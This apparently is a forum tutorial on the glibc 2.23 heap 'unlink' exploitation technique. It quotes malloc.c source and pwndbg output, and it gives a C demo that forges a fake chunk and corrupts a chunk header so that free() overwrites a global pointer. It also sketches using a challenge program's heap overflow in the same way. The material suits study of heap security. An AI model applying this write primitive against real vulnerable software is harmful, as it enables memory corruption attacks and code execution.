







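prev_size: records the size of the previous (physically adjacent) chunk. It is only meaningful while that chunk is free; otherwise it holds the previous chunk's user data.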



size: records the size of the current chunk, including its header.

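N, M, P: the three flag bits stored in the low 3 bits of size: N = NON_MAIN_ARENA (0x4), M = IS_MMAPPED (0x2), P = PREV_INUSE (0x1, set when the previous chunk is in use).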

fd, bk: two pointers that are used once a chunk has been freed. When the freed chunk is managed by a bin, they link it into that bin's list.

fd, bk, user_data, and the next chunk's prev_size: once the chunk has been allocated, all of these are used to store the user's data.







First, use gdb to debug the program dynamically and inspect the structure of main_arena.



The figures below introduce main_arena and point out the parts that matter most for this challenge:





Next, read through the glibc source, use diagrams to describe the unlink process, and then look at the checks unlink performs.

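On the Index of /gnu/glibc site, find glibc 2.23, download and extract it, and open malloc.c in the glibc-2.23\malloc directory. Searching for unlink leads to the unlink macro definition; that code is the concrete unlink process.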











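In other words, before removing P from the list, unlink first checks that the links drawn as thick red lines in the figure below point back to the chunk being removed, i.e. FD->bk == P and BK->fd == P. This guards against a corrupted doubly linked list: it catches a modified bk pointer in FD or a modified fd pointer in BK.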



























Use the heap -v command to inspect the chunks; at this point they have not been modified yet.



Then use ni to single-step the program to the instruction just before the call to free.













Next, diagrams are used to analyze the unlink process in detail. First, the conditions an unlink attack requires:

The diagrams below explain this (addresses follow those obtained in Analysis 1). The groundwork for forging the fake chunk is as follows:



The program already allocates 0x10 bytes at startup, but that chunk plays no part in the attack.









We need to allocate 3 chunks. Chunks 1 and 2 should preferably both be sized so that, once freed, they go into the unsorted bin.

The third chunk can be of any size. It is there so that when chunk 2 is freed and merged with chunk 1, the merged chunk is not then absorbed into top_chunk.





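Then use the change function to edit a chunk and trigger a heap overflow. Conveniently, a pointer to the first chunk already exists at a known address (itemlist[0].name).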





Debugging in gdb: allocate one chunk first, then run x/20gx 0x6020C0 to view this struct array. The pointer sits at 0x6020c0+0x8.

```
0x10 ---> 0001 0000
0x18 ---> 0001 1000
0x20 ---> 0010 0000
```

```c
struct malloc_state
{
  mutex_t mutex;
  int flags;
  mfastbinptr fastbinsY[NFASTBINS];
  mchunkptr top;
  mchunkptr last_remainder;
  mchunkptr bins[NBINS * 2 - 2];
  unsigned int binmap[BINMAPSIZE];
  struct malloc_state *next;
  struct malloc_state *next_free;
  INTERNAL_SIZE_T attached_threads;
  INTERNAL_SIZE_T system_mem;
  INTERNAL_SIZE_T max_system_mem;
};
```

```c
static struct malloc_state main_arena =
{
  .mutex = _LIBC_LOCK_INITIALIZER,
  .next = &main_arena,
  .attached_threads = 1
};
```

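```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>

long long int a[100];

int main() {
    long long int *p1 = malloc(0x100);
    long long int *pp = malloc(0x100);  /* separator: keeps p1 from merging with p2 */
    long long int *p2 = malloc(0x100);
    long long int *p3 = malloc(0x100);  /* borders the top chunk */

    free(p1);  /* goes into the unsorted bin */
    free(p2);  /* goes into the unsorted bin; its next chunk (p3) is still in use */
    free(p3);  /* p2 is free: unlink(p2), merge backward, then merge into top */
    return 0;
}

// gcc -o unlink_64 unlink_64.c -fno-stack-protector -z execstack
```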

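```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>

long long int a[100];

int main() {
    long long int *p1 = malloc(0x100);
    long long int *pp = malloc(0x100);  /* separator: keeps p1 from merging with p2 */
    long long int *p2 = malloc(0x100);
    long long int *p3 = malloc(0x100);
    long long int *p4 = malloc(0x100);  /* borders the top chunk */

    free(p1);  /* unsorted bin */
    free(p2);  /* unsorted bin */
    free(p3);  /* p2 is free: unlink(p2), then the merged p2+p3 chunk goes back into the unsorted bin */
    free(p4);  /* p2+p3 is free: unlink it, merge backward, then merge into top */
    return 0;
}
```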

```c
#define unlink(AV, P, BK, FD) {                                             \
    FD = P->fd;                                                              \
    BK = P->bk;                                                              \
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                    \
      malloc_printerr (check_action, "corrupted double-linked list", P, AV); \
    else {                                                                   \
        FD->bk = BK;                                                         \
        BK->fd = FD;                                                         \
        if (!in_smallbin_range (P->size)                                     \
            && __builtin_expect (P->fd_nextsize != NULL, 0)) {               \
            if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)       \
                || __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))   \
              malloc_printerr (check_action,                                 \
                               "corrupted double-linked list (not small)",   \
                               P, AV);                                       \
            if (FD->fd_nextsize == NULL) {                                   \
                if (P->fd_nextsize == P)                                     \
                  FD->fd_nextsize = FD->bk_nextsize = FD;                    \
                else {                                                       \
                    FD->fd_nextsize = P->fd_nextsize;                        \
                    FD->bk_nextsize = P->bk_nextsize;                        \
                    P->fd_nextsize->bk_nextsize = FD;                        \
                    P->bk_nextsize->fd_nextsize = FD;                        \
                }                                                            \
            } else {                                                         \
                P->fd_nextsize->bk_nextsize = P->bk_nextsize;                \
                P->bk_nextsize->fd_nextsize = P->fd_nextsize;                \
            }                                                                \
        }                                                                    \
    }                                                                        \
}
```

```c
FD = P->fd;
BK = P->bk;

FD->bk = BK;
BK->fd = FD;
```

```c
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
  malloc_printerr (check_action, "corrupted double-linked list", P, AV);
```

```c
if (!prev_inuse(p)) {
  prevsize = p->prev_size;
  size += prevsize;
  p = chunk_at_offset(p, -((long) prevsize));
  unlink(av, p, bck, fwd);
}

if (nextchunk != av->top) {
  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

  if (!nextinuse) {
    unlink(av, nextchunk, bck, fwd);
    size += nextsize;
  } else
    clear_inuse_bit_at_offset(nextchunk, 0);
```

```c
static void malloc_consolidate(mstate av)
{
  mfastbinptr*    fb;
  mfastbinptr*    maxfb;
  mchunkptr       p;
  mchunkptr       nextp;
  mchunkptr       unsorted_bin;
  mchunkptr       first_unsorted;
  mchunkptr       nextchunk;
  INTERNAL_SIZE_T size;
  INTERNAL_SIZE_T nextsize;
  INTERNAL_SIZE_T prevsize;
  int             nextinuse;
  mchunkptr       bck;
  mchunkptr       fwd;

  if (get_max_fast () != 0) {
    clear_fastchunks(av);

    unsorted_bin = unsorted_chunks(av);

    maxfb = &fastbin (av, NFASTBINS - 1);
    fb = &fastbin (av, 0);
    do {
      p = atomic_exchange_acq (fb, 0);
      if (p != 0) {
        do {
          check_inuse_chunk(av, p);
          nextp = p->fd;

          size = p->size & ~(PREV_INUSE|NON_MAIN_ARENA);
          nextchunk = chunk_at_offset(p, size);
          nextsize = chunksize(nextchunk);

          if (!prev_inuse(p)) {
            prevsize = p->prev_size;
            size += prevsize;
            p = chunk_at_offset(p, -((long) prevsize));
            unlink(av, p, bck, fwd);
          }

          if (nextchunk != av->top) {
            nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

            if (!nextinuse) {
              size += nextsize;
              unlink(av, nextchunk, bck, fwd);
            } else
              clear_inuse_bit_at_offset(nextchunk, 0);

            first_unsorted = unsorted_bin->fd;
            unsorted_bin->fd = p;
            first_unsorted->bk = p;

            if (!in_smallbin_range (size)) {
              p->fd_nextsize = NULL;
              p->bk_nextsize = NULL;
            }

            set_head(p, size | PREV_INUSE);
            p->bk = unsorted_bin;
            p->fd = first_unsorted;
            set_foot(p, size);
          }

          else {
            size += nextsize;
            set_head(p, size | PREV_INUSE);
            av->top = p;
          }

        } while ( (p = nextp) != 0);

      }
    } while (fb++ != maxfb);
  }
  else {
    malloc_init_state(av);
    check_malloc_state(av);
  }
}
```



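```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>

/* Unlink demo, assuming glibc 2.23 on x86-64. On glibc 2.26+ the 0x110
   chunk freed by free(p2) would go into tcache and no unlink would happen. */

long long unsigned int* a[100];

int main()
{
    long long unsigned int *p1, *p2, *p3, target;

    target = (long long unsigned int)&a[5];   /* address of the global pointer a[5] */
    printf("target:%p\n%p\n%p\n", (void *)target,
           (void *)(target - 0x18), (void *)(target - 0x10));

    a[0] = (void*)0x0;
    a[1] = (void*)0x110;

    malloc(0x20);
    p1 = malloc(0x100);   /* chunk 1: the fake chunk is built in its user data */
    p2 = malloc(0x100);   /* chunk 2: freeing it triggers backward consolidation */
    p3 = malloc(0x100);   /* chunk 3: keeps chunk 2 away from the top chunk */

    a[5] = p1;            /* known location holding a pointer to the fake chunk */
    printf("beforefree:a[5]: %p\n", (void *)a[5]);
    printf("p1: %p\n", (void *)p1);

    /* Fake chunk inside p1's user data. */
    p1[0] = 0x0;                                        /* fake prev_size */
    p1[1] = 0x101;                                      /* fake size */
    p1[2] = (long long unsigned int)(target - 0x18);    /* fake fd: FD->bk is a[5] */
    p1[3] = (long long unsigned int)(target - 0x10);    /* fake bk: BK->fd is a[5] */

    /* Simulated overflow into chunk 2's header. */
    p2[-2] = 0x100;   /* prev_size: chunk 2 - 0x100 == p1, the fake chunk */
    p2[-1] = 0x110;   /* size with PREV_INUSE cleared */

    free(p2);         /* unlink(fake chunk) leaves a[5] == target - 0x18 (&a[2]) */
    printf("afterfree:a[5]: %p\n", (void *)a[5]);

    return 0;
}
```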

```
0x7f3ac4ad8fe0 <_int_free+640> ✔ jne _int_free+2048 <_int_free+2048>
```

```
pwndbg> x/20gx 0x600b10-0x20
0x600af0:        0x0000000000000000  0x0000000000000000
0x600b00 <a>:    0x0000000000000000  0x0000000000000000
0x600b10 <a+16>: 0x0000000000000000  0x0000000000000000
0x600b20 <a+32>: 0x0000000000000000  0x0000000000600b10
0x600b30 <a+48>: 0x0000000000000000  0x0000000000000000
0x600b40 <a+64>: 0x0000000000000000  0x0000000000000000
0x600b50 <a+80>: 0x0000000000000000  0x0000000000000000
0x600b60 <a+96>: 0x0000000000000000  0x0000000000000000
0x600b70 <a+112>: 0x0000000000000000 0x0000000000000000
0x600b80 <a+128>: 0x0000000000000000 0x0000000000000000
pwndbg> unsorted
unsortedbin
empty
```

```
  0x7f18ae011f71 <_int_free+529>    cmp    rbx, qword ptr [rdx + 0x10]
  0x7f18ae011f75 <_int_free+533>    jne    _int_free+3034 <_int_free+3034>
  0x7f18ae011f7b <_int_free+539>    cmp    qword ptr [rbx + 8], 0x3ff
  0x7f18ae011f83 <_int_free+547>    mov    qword ptr [rax + 0x18], rdx
► 0x7f18ae011f87 <_int_free+551>    mov    qword ptr [rdx + 0x10], rax
  0x7f18ae011f8b <_int_free+555>    jbe    _int_free+624 <_int_free+624>

pwndbg> bins
fastbins
empty
unsortedbin
empty
smallbins
empty
largebins
empty
```

```c
FD = P->fd;
BK = P->bk;

if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
  malloc_printerr (check_action, "corrupted double-linked list", P, AV);
```

```c
FD->bk = BK;
BK->fd = FD;
```

```c
static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
  INTERNAL_SIZE_T size;
  mfastbinptr *fb;
  mchunkptr nextchunk;
  INTERNAL_SIZE_T nextsize;
  int nextinuse;
  INTERNAL_SIZE_T prevsize;
  mchunkptr bck;
  mchunkptr fwd;

  const char *errstr = NULL;
  int locked = 0;

  size = chunksize (p);

  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
      || __builtin_expect (misaligned_chunk (p), 0))
    {
      errstr = "free(): invalid pointer";
    errout:
      if (!have_lock && locked)
        (void) mutex_unlock (&av->mutex);
      malloc_printerr (check_action, errstr, chunk2mem (p), av);
      return;
    }

  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
    {
      errstr = "free(): invalid size";
      goto errout;
    }

  check_inuse_chunk(av, p);

  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
#if TRIM_FASTBINS
      && (chunk_at_offset(p, size) != av->top)
#endif
      ) {

    if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
        || __builtin_expect (chunksize (chunk_at_offset (p, size))
                             >= av->system_mem, 0))
      {
        if (have_lock
            || ({ assert (locked == 0);
                  mutex_lock(&av->mutex);
                  locked = 1;
                  chunk_at_offset (p, size)->size <= 2 * SIZE_SZ
                    || chunksize (chunk_at_offset (p, size)) >= av->system_mem;
              }))
          {
            errstr = "free(): invalid next size (fast)";
            goto errout;
          }
        if (! have_lock)
          {
            (void)mutex_unlock(&av->mutex);
            locked = 0;
          }
      }

    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);

    set_fastchunks(av);
    unsigned int idx = fastbin_index(size);
    fb = &fastbin (av, idx);

    mchunkptr old = *fb, old2;
    unsigned int old_idx = ~0u;
    do
      {
        if (__builtin_expect (old == p, 0))
          {
            errstr = "double free or corruption (fasttop)";
            goto errout;
          }
        if (have_lock && old != NULL)
          old_idx = fastbin_index(chunksize(old));
        p->fd = old2 = old;
      }
    while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);

    if (have_lock && old != NULL && __builtin_expect (old_idx != idx, 0))
      {
        errstr = "invalid fastbin entry (free)";
        goto errout;
      }
  }

  else if (!chunk_is_mmapped(p)) {
    if (! have_lock) {
      (void)mutex_lock(&av->mutex);
      locked = 1;
    }

    nextchunk = chunk_at_offset(p, size);

    if (__glibc_unlikely (p == av->top))
      {
        errstr = "double free or corruption (top)";
        goto errout;
      }
    if (__builtin_expect (contiguous (av)
                          && (char *) nextchunk
                          >= ((char *) av->top + chunksize(av->top)), 0))
      {
        errstr = "double free or corruption (out)";
        goto errout;
      }
    if (__glibc_unlikely (!prev_inuse(nextchunk)))
      {
        errstr = "double free or corruption (!prev)";
        goto errout;
      }

    nextsize = chunksize(nextchunk);
    if (__builtin_expect (nextchunk->size <= 2 * SIZE_SZ, 0)
        || __builtin_expect (nextsize >= av->system_mem, 0))
      {
        errstr = "free(): invalid next size (normal)";
        goto errout;
      }

    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);

    if (!prev_inuse(p)) {
      prevsize = p->prev_size;
      size += prevsize;
      p = chunk_at_offset(p, -((long) prevsize));
      unlink(av, p, bck, fwd);
    }

    if (nextchunk != av->top) {
      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

      if (!nextinuse) {
        unlink(av, nextchunk, bck, fwd);
        size += nextsize;
      } else
        clear_inuse_bit_at_offset(nextchunk, 0);

      bck = unsorted_chunks(av);
      fwd = bck->fd;
      if (__glibc_unlikely (fwd->bk != bck))
        {
          errstr = "free(): corrupted unsorted chunks";
          goto errout;
        }
      p->fd = fwd;
      p->bk = bck;
      if (!in_smallbin_range(size))
        {
          p->fd_nextsize = NULL;
          p->bk_nextsize = NULL;
        }
      bck->fd = p;
      fwd->bk = p;

      set_head(p, size | PREV_INUSE);
      set_foot(p, size);

      check_free_chunk(av, p);
    }

    else {
      size += nextsize;
      set_head(p, size | PREV_INUSE);
      av->top = p;
      check_chunk(av, p);
    }

    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
      if (have_fastchunks(av))
        malloc_consolidate(av);

      if (av == &main_arena) {
#ifndef MORECORE_CANNOT_TRIM
        if ((unsigned long)(chunksize(av->top)) >=
            (unsigned long)(mp_.trim_threshold))
          systrim(mp_.top_pad, av);
#endif
      } else {
        heap_info *heap = heap_for_ptr(top(av));

        assert(heap->ar_ptr == av);
        heap_trim(heap, mp_.top_pad);
      }
    }

    if (! have_lock) {
      assert (locked);
      (void)mutex_unlock(&av->mutex);
    }
  }
  else {
    munmap_chunk (p);
  }
}
```

Last edited by iyheart on 2024-10-15 20:44. Reason: fixed 1 typo and 5 images that failed to display.